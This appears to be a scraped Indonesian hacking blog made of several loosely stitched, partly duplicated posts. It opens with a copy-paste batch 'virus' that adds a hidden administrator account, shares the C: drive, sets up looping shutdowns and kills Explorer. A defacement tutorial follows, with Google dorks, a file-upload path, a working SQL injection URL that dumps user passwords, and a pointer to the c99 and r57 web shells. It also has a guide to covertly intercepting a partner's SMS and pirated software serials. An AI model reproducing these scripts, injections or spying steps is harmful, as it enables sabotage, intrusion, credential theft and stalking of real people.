Emang gak ada habisnya cara buat iseng, begitupun dengan berbagai script VBS maupun Batch Script,
Untuk kali ini scriptnya lebih parah, kalian bisa lihat efeknya dibawah ini :
* membuat jam pada kompi jadi jam 12.00
* membuat disk drive penuh semua
* membuat explorer.exe mati
* mendiseble task manager
* mendiseble regedit
* merusak file yg ada
* menyerang ulang setiap jam 12.00.
Gimane, lumayan gak tuh.. langsung aja deh copas script dibawah ini :
@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2011
echo 12:00:00.00 | time >> nul
echo 01/01/2011 | date >> nul
net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt
rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators Microsoft_support /add
rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs
rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y @ 12:01 and 12:02
at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs”
rem ****************************************************************************************************************************************
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y
echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”
rem ****************************************************************************************************************************************
cd\
cls
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\
cd %systemroot%\system32
attrib +h +s +r 1001
rem K1||5 th3 3xp|0r3r.3×3 Pr0c355
taskkill /F /IM explorer.exe
rem @ EOV // End of Virus
Sinpan dengan ekstensi .bat ya…..klo udah tinggal anda jalanin deh.
oya jangan pernah anda coba di komputer sendiri ya...!!!
SEGALA KERUSAKAN YANG TERJADI MENJADI TANGGUNG JAWAB ANDA SENDIRI..!!
NB : Jangan Lupa tinggalkan komentar kalian
Sabtu, 30 Juli 2011
Tutor Hacker bwd pemula .
Ok, di posting saya kali ini, saya akan mengulas lagi bagaimana cara untuk hacking website dan mendefacex untuk para pemula, jadi kita cukup menggunakan dork aja,,
pertama2 buka milw0rm,
Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.
1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di cuba
misalnya neh :
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
4. Setelah itu muncul upload files
5. Lu bikin html yang bagus terus upload dah...
Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja dihttp://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)
3. Selamat mencoba !
SQL Injection
--------------
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.
2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan inihttp://thesoftwareengineer.org/services/md5.php
4. Selamat Mencuba
pertama2 buka milw0rm,
Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.
1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di cuba
misalnya neh :
- Code:
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
- Code:
/cgi-bin/ourspace/newswire/uploadmedia.cgi
4. Setelah itu muncul upload files
5. Lu bikin html yang bagus terus upload dah...
Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja dihttp://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
- Code:
- http://milw0rm.com/exploits/1779 - http://milw0rm.com/exploits/1913 - http://milw0rm.com/exploits/4276
selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)
3. Selamat mencoba !
SQL Injection
--------------
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.
2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :
- Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan inihttp://thesoftwareengineer.org/services/md5.php
4. Selamat Mencuba
Hack IDM ( Silahkan di coba)
Gan , tadi ane searching2 di Forum sebelah , ternyata ada trit "Cara setting IDM biar Bikin ngacir-cir". nah buat kalian agan2 yang menggunakan download manager IDM, kadang belum benar-benar merasakan manfaat dari SW tsb, karena belum disetting dengan benar. Jika sudah diseting, IDM akan berfungsi optimal, meskipun kita gonta-ganti tipe koneksi (wive-LAN, WIFI, Dial-up, dll).
Nah bagemana caranya biar agan2 bisa merasakan manfaat ilmu yang ane dapet hingga bikin downloadan nte yang biasanya sejam berubah jadi 15 menit , jadi bisa hemat waktu gan !!
hhee
nih contohnya :
http://4.bp.blogspot.com/_oQGx3yTv_Ss/TIYqJJEzbnI/AAAAAAAAERo/kKtfVzQCoac/s1600/abpnhmv3.jpg
Pertannyaanya , Bagaiamana caranya Membuat IDM Download 3x Lebih Cepat alias Ngaciiir ?
Gini caranya:
1. klik IDM di try icon
2. klik Option
3. Pada Connection/ Speed, pilih Other, dan pada Default Max conn.number pilih 16
4. Tutup IDM
5. Klik Start kemudian un dan tuliskan "regedit" tanpa petik , kemudian klik ok , Jalankan Regedit>HKey_Current_User>Software>Download Manager> (lihat jendela kanan) Connection Speed>double click>pilih decimal> isi dengan 9999999999999>OK
6. tutup regedit (close )
7. Coba ntuk DL....;-)
Catatan:
Kecepatan Download dipengaruhi juga oleh kondisi jaringan yg ada..
Yg maw jailin temen download dah ...
kalo tidak percaya silahkan download aja langsung pasti muka teman kalian pada merah semua di kerjain sama software ini di jamin tidak akan rusak kom teman kalian cuma ngejailin aja ko silah kan kalo ada yg berminat
Download Di Sini
Cara memantau SMS (u/ Hp java oply)
Punya masalah sama pacar sendiri, pengen mata-matain aktivitasnya tapi susah… hhhaaa, emang problem anak mude sekarang gitu-gitu aja.. Ini solusi buat kalian yang memiliki masalah seperti itu. Ataupun kallian yang emang buat iseng-iseng aja. Langsung aja kita prakteklah…Sebuah layanan gratis untuk memonitor ponsel diluncurkan oleh Bloove.com. Fitur yang ada di antaranya adalah mem-forward SMS (yang juga berarti menyadap SMS), mengimport kontak dari ponsel yang terdaftar ke database Bloove, bahkan Anda bisa mengirim SMS lewat layanan ini. Persyaratan yang paling penting agar dapat memfungsikan layanan ini adalah ponsel yang dijadikan target harus terintegrasi koneksi GPRS. Sekarang tunggu apa lagi? Let’s try it!
Caranya tidak terlalu rumit. Berikut tutorial untuk menyadap SMS lewat Internet :
1. Sebelumnya silahkan lihat compatibel list (tipe ponsel yang cocok dengan layanan ini). Bila ponsel target ada di dalamnya, langsung saja membuat akun agar dapat menggunakan layanan ini. Segeralah mendaftarkan diri ke www.bloove.com (gratis – tidak dipungut biaya sepeserpun) untuk mendapatkan akun. Isi formulir registrasi, Anda hanya butuh email untuk mendaftar.
2. Abaikan saja dulu pada tab Agent ID.
3. Setelah registrasi selesai Anda akan langsung digiring masuk ke halaman profile. Anda akan disuruh mengisi tab Enter ID displayed by Agent. Abaikan lagi.
4. Kini yang perlu Anda lakukan adalah men-setting ponsel target agar dapat tersinkronisasi dengan database Bloove. Pertama download aplikasi ini (http://bloove/m) menggunakan ponsel target. Atau Anda bisa mendownload-nya langsung dari PC/Laptop kemudian transfer kan ke ponsel target. Jangan lupa install aplikasi tersebut di ponsel target.
5. Setting dulu permission (izin)-nya (untuk hape Java), ga tahu yang lain.
Option > Application access > Communication > Network access > Always allowed > Yes
Option > Application access > Communication > Messaging > Always allowed > Yes
Option > Application access > Communication > Connectivity > Always allowed > Yes
Option > Application access > Data access > Multimedia recording > Always allowed > Yes
Option > Application access > Data access > Read user data > Always allowed > Yes
Option > Application access > Data access > Add and edit data > Always allowed > Yes
Option > Application access > Data access > Smart card > Always allowed > Yes
Option > Application access > Auto-start > Always allowed > Yes
6. Catat ID yang Anda dapatkan. Isikan ID tersebut di tab Enter ID displayed by Agent yang Anda abaikan tadi. Ikuti petunjuk di bawahnya. Isikan tipe ponsel target.
7. Bila status online berarti ponsel tersebut berada dalam jangkauan GPRS yang telah tersinkronisasi dengan Bloove. Yang berarti pula ponsel target telah resmi dimata – matai. Heheh.. :-D
Ingat, satu akun untuk satu nomor handphone saja. Sebenarnya masih banyak fitur ‘mengejutkan’ yang tersedia di layanan ini. Jika ingin tahu coba saja sendiri! Namun sayang untuk tipe hape ber-platform Java hanya bisa mengimport kontak dari hape target. Sedikit tips dari saya, sebisa mungkin sembunyikan aplikasi ini agar tidak ketahuan korban. Tidak perlu khawatir dengan pulsa target, karena hanya di-charged biaya GPRS yang sangat kecil nominal nya.
Terakhir, saya berpesan agar menggunakan layanan ini dengan benar dan jangan sampai melanggar kode etik (paling ngga jangan terlalu lah).
selamat mencoba Laughing
Jumat, 29 Juli 2011
IDM 6.6.8 (Repost)
IDM adalah tool yang sangad berguna untuk mengakselerasi download, juga software ini sih sangad berguna bagi saya ..(sebenernya relatif sih) tergantung si pemakai ...
Kalau pake software ini bisa download video dari Flash Player dengan cepat dan mudah ..
timbang basabasi ini dia cekidot!
http://www.mediafire.com/?bky6hbbbyh84etd
Serial : - 6NBF3-2AG73-N318M-J6IX0
- L57L4-1SMNI-E8D8F-L7I19
- OKF5E-8TKYR-831K7-F67YR
- N2SUY-76DJH-3SVBS-XB1L1
- 454MY-3JMTD-O4TC4-JU2BU
- 4UW8A-WF3I9-7XV83-K3P8B
E-Mail dan Nama d asal aja gpp ..
Tq ..
klo masi g isa download aja patchnya d sini
http://www.mediafire.com/?wx285cgcfa4vpnn
10000% work klo g work email saya di jap.nanang@gmail.com
Bwd yang maw install ulang sebaiknya membackup driver dlo, langsung aja caranya ..
Tips komputer kali ini adalah tentang cara backup Driver komputer. Dimana backup driver sangat bermanfa'at apabila kita ingin menginstal ulang Windows, tapi CD drivernya hilang. Dan apabila anda sudah membackup driver, jadinya anda tidak perlu susah-susah mencari driver komputer anda di internet.
Software yang kita gunakan untuk backup Driver adalah Driver Genius. Link download softwarenya ada dibawah ini.
DOWNLOAD
Dan berikut cara backup driver komputer :
- Buka Driver Genius, pilih menu Backup Drivers dan pada Select the drivers you want to backup, centang opsi Current Used Drivers. Karena driver yang kita butuhkan cuma yang tidak bawaan Windows. Kalau sudah klik Next.
- Pada bagian Select the backup type, anda bisa memilih jenis backupnya. Untuk ini, saya pilih ZIP Archive. Setelah itu tentukan lokasi penyimpanan backup dengan klik Browse. Lanjut klik Next.
- Tunggu sampai proses backupnya selesai. Kalau sudah selesai, klik Finish dan buka lokasi anda menyimpan backup tersebut.
Post selanjutnya --> Backup Partisi anda dengan aman dan nyaman ..
Selamat menunggu ...
Tq ...
Screenshoot menyusul..
Google Hack cuman sekedar share doang gan!
Kemaren saya sudah share tentang Penetration Testing Concept, yang Insya Allah akan ada kelanjutannya dengan membahas masing-masing point yang sudah diterangkan. Namun sebelum itu, saya mau share dulu tentang Informasi yang saya dapatkan sebelum ini.
Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “KromCAT - Google Chrome Catalog of Auditing exTensions“. Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.
Mungkin bagi fans google chrome sudah terbiasa memakai tool yang include didalamya yaitu “Inspect Element, Resources, Script, Dsb“.
Silakan ditonton implementasinya pada video berikut:
Namun untuk menjadikan Google Chrome Sebagai Mesin Hacking yang handal, kita membutuhkan beberapa tools yang mendukung. Dimana saya menggunakan hal ini untuk melakukan audit site.
Nah, berikut adalah roadmap catalog dan plugin yang bisa digunakan agar google chrome menjadi browser yang powerfull untuk aktifitas hacking. Ada beberapa tool didalamnya mengenai “Information Gathering Tools, Application Assessment, Editors, Network Utilities, Miscellaneous, Proxies And Web Utilities, IT Security Related“. Silakan dilihat detailnya digambar berikut:
roadmap presented by vulnerabilitydatabaseJika ingin melakukan aktifitas penetration testing atau audit untuk website / target. Sebaiknya siapkan peralatan di atas untuk menunjang keberhasilan aktifitas yang dilakukan.
Semoga informasi ini bermanfaat buat anda semua.
Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “KromCAT - Google Chrome Catalog of Auditing exTensions“. Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.
Mungkin bagi fans google chrome sudah terbiasa memakai tool yang include didalamya yaitu “Inspect Element, Resources, Script, Dsb“.
Silakan ditonton implementasinya pada video berikut:
Namun untuk menjadikan Google Chrome Sebagai Mesin Hacking yang handal, kita membutuhkan beberapa tools yang mendukung. Dimana saya menggunakan hal ini untuk melakukan audit site.
Nah, berikut adalah roadmap catalog dan plugin yang bisa digunakan agar google chrome menjadi browser yang powerfull untuk aktifitas hacking. Ada beberapa tool didalamnya mengenai “Information Gathering Tools, Application Assessment, Editors, Network Utilities, Miscellaneous, Proxies And Web Utilities, IT Security Related“. Silakan dilihat detailnya digambar berikut:
roadmap presented by vulnerabilitydatabase
Semoga informasi ini bermanfaat buat anda semua.
sekedar iseng aja bos ( Open Suse to Win 7 ) Cuman Tema .. Wkwkwkwk ....
Secara umum saya pribadi tidak memiliki kendala berarti dengan sistem menu dan berbagai macam tampilan sistem Linux, apalagi sekarang tampilan Linux memiliki berbagai variasi yang menarik. Hal berbeda saya alami sewaktu masih bekerja di Tanjung Priok dan melakukan migrasi sistem dari Windows ke Linux, ada beberapa kendala minor terkait dengan tampilan yang dianggap berbeda dengan tampilan Windows.
Untuk mengatasi hal seperti itu biasanya saya menggunakan sedikit trik, antara lain dengan mengganti baju (tampilan) Linux menjadi mirip dengan Windows. Untuk contoh kali ini saya menggunakan Linux openSUSE 11.4 64 bit dengan desktop environment Gnome. Hal yang sama sudah saya ujicoba pada Linux Fedora, LinuxMint dan Ubuntu, panduannya akan saya tuliskan pada artikel selanjutnya.
Bagi rekan-rekan yang bermaksud melakukan hal yang sama, silakan ikuti panduan berikut ini :
Khusus untuk start menu, silakan ikuti panduan berikut untuk mengubahnya agar semakin mirip dengan model menu Windows 7 :
Beberapa rekan yang skeptis bilang ke saya, “Nggak sanggup beli Windows ya, sampai-sampai menyamarkan tampilan”
. Saya menerima pendapat itu dengan baik karena memang demikian adanya, hehehe…
Original: http://vavai.com/2011/07/17/linux-dengan-tampilan-windows-7-opensuse-seven/
Semoga artikel bermanfaat dan jangan lupa kunjungi forum binushacker:
Untuk mengatasi hal seperti itu biasanya saya menggunakan sedikit trik, antara lain dengan mengganti baju (tampilan) Linux menjadi mirip dengan Windows. Untuk contoh kali ini saya menggunakan Linux openSUSE 11.4 64 bit dengan desktop environment Gnome. Hal yang sama sudah saya ujicoba pada Linux Fedora, LinuxMint dan Ubuntu, panduannya akan saya tuliskan pada artikel selanjutnya.
Bagi rekan-rekan yang bermaksud melakukan hal yang sama, silakan ikuti panduan berikut ini :
- Download file themes untuk Windows 7 melalui link berikut ini : http://mirror.linux.or.id/linux/etc/. Ambil file Win2-7Pack_v6.5_Multilang_Aero.tar.lzma.
- Ekstrak ke folder lokal dengan memilih menu Klik kanan, Extract Here.
- Jalankan file GUIInstall.sh. Hati-hati jangan tertukar dengan file GUIUninstall.sh
- Ikuti wizard yang diberikan. Saya mendapat peringatan bahwa ada kemungkinan themes ini tidak cocok dengan openSUSE 11.4 karena developernya melakukan testing pada openSUSE versi sebelumnya. Meski demikian saya proof test tidak ada masalah
- Dalam sekejap, tampilan akan berubah menjadi model Windows 7. Hanya satu yang belum berubah yaitu menu Start. Silakan logout untuk memastikan update tampilan yang dilakukan
Khusus untuk start menu, silakan ikuti panduan berikut untuk mengubahnya agar semakin mirip dengan model menu Windows 7 :
- Buka Open Build Services (OBS) : http://software.opensuse.org/search
- Klik pada pilihan Search Options dan berikan tanda centang pada pilihan Include users’ home projects
- Ketik “Gnomenu” pada kotak pencarian (tanpa tanda kutif)
- Pilih 1-Click-Install
- Jika sudah selesai terinstall, klik kanan pada bagian panel bar, kemudian pilih “Add to Panel”, pilih Gnomenu
- Klik kanan pada Gnomenu yang baru ditambahkan, pilih properties dan lakukan setting sesuai keinginan. Lihat pada contoh gambar berikut :
Beberapa rekan yang skeptis bilang ke saya, “Nggak sanggup beli Windows ya, sampai-sampai menyamarkan tampilan”
. Saya menerima pendapat itu dengan baik karena memang demikian adanya, hehehe…Original: http://vavai.com/2011/07/17/linux-dengan-tampilan-windows-7-opensuse-seven/
Semoga artikel bermanfaat dan jangan lupa kunjungi forum binushacker:
Senin, 25 Juli 2011
Beberapa Antivirus palsu yang akan merusak OS kita
Bagi yang belum tahu, saat ini banyak Antivitus untuk menangani Virus, Spyware, Malware, Dsb palsu beredar di Internet. Kalangan awam takkan pernah tahu hal ini, karena biasanya kalau dengan Antivirus Gratis Tahun “2011″, langsung aja maen download.
Berikut adalah hasil analisa Steven K a.k.a @Xylit0l, membedah tools-tools ini dengan disassembler / debugger. Hasil pembedahannya dari tools-tools palsu tersebut adalah sebagai berikut
Security Solution 2011 adalah software security palsu (rogue). Ini juga hampir sama dengan: Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex!
Security Solution 2011 menampilkan banyak pesan yang mengharuskan pengguna untuk membeli lisensi.
Untuk melakukan registrasi (dan help removal), silakan masukkan serial code berikut yang sebenarnya sudah tertanam dalam program: LIC2-00A6-234C-B6A9-38F8-F6E2-0838-F084-E235-6051-18B3
Suspended page palsu yang ditampilkan:
Malware Protection adalah tools antivirus palsu. Tools ini juga sama palsunya dengan Spyware Protection, Advanced Security Tool 2010, Security Central, Home Personal Antivirus, XP Deluxe Protector, Win PC Antivirus, Win PC Defender, XP Police Antivirus, IE-Security, WinDefender 2009 and Total Secure 2009. (Thanks to S!Ri for the list)
Tools palsu ini menampilkan pesan infeksi palsu malware yang banyak, seperti contoh gambar diatas dan menampilkan alert kepada pengguna untuk menakut-nakuti.
Untuk melakukan registrasi dan menghapus alert, silakan gunakan serial code berikut yang sudah tertanam di dalam software: SL55J-T54YHJ61-YHG88
FakeAV-Downloader.K. Serangan antivirus palsu masih banyak dijumpai. Teknik yang digunakan cukup beragam, mulai dari pesan palsu yang memanfaatkan fasilitas chatting atau jejaring sosial, ataupun email palsu yang berisi pesan dengan melampirkan sebuah attachment dan berasal dari account yang tidak Anda kenal.
A. Info Malware
Nama: FakeAV-Downloader.K
Asal: Rusia (dugaan)
Ukuran File: 324 KB
Packer: -
Pemrograman: Microsoft Visual C++
Icon: Windows XP Application
Tipe: Trojan Downloader
B. Tentang Malware
Fake Antivirus atau Antivirus palsu termasuk salah satu malware yang sudah tidak asing lagi bagi beberapa pengguna komputer. Banyaknya kejadian di mana seorang user yang tanpa sengaja mendownload sebuah program yang kemudian dijalankan, dan antivirus palsu langsung aktif di komputernya. Seperti pada gambar diatas yang isinya adalah sebuah email yang ditunjukkan kepada beberapa account dengan menyertakan attachment yang tidak jelas. Hasil yang ditimbulkan jika menjalankan file tersebut bisa sangat beragam, mulai dari pembajakan account pribadi, adanya keylogger, mendownload file lain dari website tertentu untuk di jalankan secara otomatis atau mendownload antivirus palsu seperti FakeAV-Downloader.K.
FakeAV-Downloader.K umumnya berasal dari website yang terkadang namanya terbilang cukup aneh. Setelah ditelusuri, terdapat satu buah kesamaan, bahwa dari beberapa domain yang berbeda, memilik satu buah account registrasi yang selalu sama. Contoh:
(Nama Random)
+7122740645 fax: +7122740645
Nevskij pr-kt d.134 lit.B pom.5N
Sankt-Peterburg Sankt-Peterburg 191036
RU
Website yang dibuat seolah menunjukkan tidak adanya ancaman bagi user, contohnya testimonial yang ditampilkan pada halaman utama website. Setelah ditelusuri lebih jauh, testimonial tersebut hanyalah hasil copy paste.
Testimonial yang yang sudah dirubah atau palsu:
“I tried a few different programs in my day. Absolutely none have ever been as effective as [Nama antivirus palsu]. While nothing is perfect, [Nama antivirus palsu] seems to strive to be as close as they can be in their craft. Thanks for making the ‘net possible for me and my family.”
Testimonial asli dari salah satu website antivirus:
“I tried a few different programs in my day. Absolutely none have ever been as effective as AVG. While nothing is perfect, AVG seems to strive to be as close as they can be in their craft. Thanks for making the ‘net possible for me and my family.”
C. Companion/File yang dibuat
Ada 3 buah file yang dibuat. 1 adalah host dari virus dan 2 lainnya adalah companionnya.
1. file host yang selalu ada di folder :
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak].exe
2. File Temporary dengan nama acak
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak]
3. File Dat dengan nama acak
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak].Dat
D. Hasil Infeksi
Yang menarik dari malware ini adalah memiliki beragam caption aplikasi serta hampir seluruh teks utama dari interfacenya berubah, padahal file hostnya tetap sama. Nama nama yang digunakan antara lain adalah:
- XP Home Security 2011
- XP Anti-Virus 2011
- XP Home Security
- XP Security 2011
- XP Anti-Spyware 2011
- XP Anti-Spyware
- XP Internet Security 2011
- XP Total Security
Ini adalah beberapa screenshot dari FakeAV-Downloader.K:
Harga yang ditawarkan untuk antivirus palsu ini:
E. Pembersihan
Worm ini telah dikenali dan dapat dibersihkan pada PCMAV 5.0 Update Build3 ini berikut ini.
PCMAV 5.0 Update Build3
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.0 Update Build3 telah hadir dengan penambahan 89 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.0, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
Rapidshare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Berikut adalah hasil analisa Steven K a.k.a @Xylit0l, membedah tools-tools ini dengan disassembler / debugger. Hasil pembedahannya dari tools-tools palsu tersebut adalah sebagai berikut
Security Solution 2011
Security Solution 2011 adalah software security palsu (rogue). Ini juga hampir sama dengan: Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex!
Untuk melakukan registrasi (dan help removal), silakan masukkan serial code berikut yang sebenarnya sudah tertanam dalam program: LIC2-00A6-234C-B6A9-38F8-F6E2-0838-F084-E235-6051-18B3
Malware Protection
Malware Protection adalah tools antivirus palsu. Tools ini juga sama palsunya dengan Spyware Protection, Advanced Security Tool 2010, Security Central, Home Personal Antivirus, XP Deluxe Protector, Win PC Antivirus, Win PC Defender, XP Police Antivirus, IE-Security, WinDefender 2009 and Total Secure 2009. (Thanks to S!Ri for the list)
Untuk melakukan registrasi dan menghapus alert, silakan gunakan serial code berikut yang sudah tertanam di dalam software: SL55J-T54YHJ61-YHG88
FAKE AV DOWNLOAD
Selanjutnya adalah hasil analisa AntiVirus palsu dari VirusIndonesia[dot]com, berikut adalah hasilnyaFakeAV-Downloader.K. Serangan antivirus palsu masih banyak dijumpai. Teknik yang digunakan cukup beragam, mulai dari pesan palsu yang memanfaatkan fasilitas chatting atau jejaring sosial, ataupun email palsu yang berisi pesan dengan melampirkan sebuah attachment dan berasal dari account yang tidak Anda kenal.
A. Info Malware
Nama: FakeAV-Downloader.K
Asal: Rusia (dugaan)
Ukuran File: 324 KB
Packer: -
Pemrograman: Microsoft Visual C++
Icon: Windows XP Application
Tipe: Trojan Downloader
B. Tentang Malware
Fake Antivirus atau Antivirus palsu termasuk salah satu malware yang sudah tidak asing lagi bagi beberapa pengguna komputer. Banyaknya kejadian di mana seorang user yang tanpa sengaja mendownload sebuah program yang kemudian dijalankan, dan antivirus palsu langsung aktif di komputernya. Seperti pada gambar diatas yang isinya adalah sebuah email yang ditunjukkan kepada beberapa account dengan menyertakan attachment yang tidak jelas. Hasil yang ditimbulkan jika menjalankan file tersebut bisa sangat beragam, mulai dari pembajakan account pribadi, adanya keylogger, mendownload file lain dari website tertentu untuk di jalankan secara otomatis atau mendownload antivirus palsu seperti FakeAV-Downloader.K.
FakeAV-Downloader.K umumnya berasal dari website yang terkadang namanya terbilang cukup aneh. Setelah ditelusuri, terdapat satu buah kesamaan, bahwa dari beberapa domain yang berbeda, memilik satu buah account registrasi yang selalu sama. Contoh:
(Nama Random)
+7122740645 fax: +7122740645
Nevskij pr-kt d.134 lit.B pom.5N
Sankt-Peterburg Sankt-Peterburg 191036
RU
Website yang dibuat seolah menunjukkan tidak adanya ancaman bagi user, contohnya testimonial yang ditampilkan pada halaman utama website. Setelah ditelusuri lebih jauh, testimonial tersebut hanyalah hasil copy paste.
Testimonial yang yang sudah dirubah atau palsu:
“I tried a few different programs in my day. Absolutely none have ever been as effective as [Nama antivirus palsu]. While nothing is perfect, [Nama antivirus palsu] seems to strive to be as close as they can be in their craft. Thanks for making the ‘net possible for me and my family.”
Testimonial asli dari salah satu website antivirus:
“I tried a few different programs in my day. Absolutely none have ever been as effective as AVG. While nothing is perfect, AVG seems to strive to be as close as they can be in their craft. Thanks for making the ‘net possible for me and my family.”
C. Companion/File yang dibuat
Ada 3 buah file yang dibuat. 1 adalah host dari virus dan 2 lainnya adalah companionnya.
1. file host yang selalu ada di folder :
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak].exe
2. File Temporary dengan nama acak
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak]
3. File Dat dengan nama acak
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak].Dat
D. Hasil Infeksi
Yang menarik dari malware ini adalah memiliki beragam caption aplikasi serta hampir seluruh teks utama dari interfacenya berubah, padahal file hostnya tetap sama. Nama nama yang digunakan antara lain adalah:
- XP Home Security 2011
- XP Anti-Virus 2011
- XP Home Security
- XP Security 2011
- XP Anti-Spyware 2011
- XP Anti-Spyware
- XP Internet Security 2011
- XP Total Security
Ini adalah beberapa screenshot dari FakeAV-Downloader.K:
Harga yang ditawarkan untuk antivirus palsu ini:
E. Pembersihan
